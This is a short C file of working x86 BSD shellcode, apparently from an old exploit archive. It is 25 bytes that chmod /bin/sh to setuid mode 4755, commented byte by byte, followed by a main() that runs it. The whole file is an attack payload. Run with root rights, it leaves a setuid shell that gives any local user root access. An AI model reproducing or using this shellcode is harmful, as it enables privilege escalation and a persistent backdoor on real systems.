/* 25 bytes chmod 4755 /bin/sh shellcode - BSD-x86
 * - by bighawk (bighawk@warfare.com)
 *
 * Tested on: NetBSD-1.5, FreeBSD-4.3, OpenBSD-2.9-current
 *
 * Thanks to fi for the idea :)
 */

char code[] =

   "\x99"			// cdq
   "\x52"			// push   edx
   "\x68\x6e\x2f\x73\x68"	// push   dword 68732f6eh       ; "hs/n"
   "\x68\x2f\x2f\x62\x69"       // push   dword 69622f2fh       ; "ib//"
   "\x89\xe3"			// mov    ebx, esp
   "\x66\xba\xed\x09"		// mov    dx, 9edh		; mode 4755	
   "\x52"			// push   edx
   "\x53"			// push	  ebx
   "\x53"			// push   ebx
   "\xb0\x0f"			// mov    al, 0fh               ; SYS_chmod
   "\xcd\x80";			// int	  80h
 
main() {
  void (*a)() = (void *)code;
  printf("size: %d bytes\n", strlen(code));
  a();
}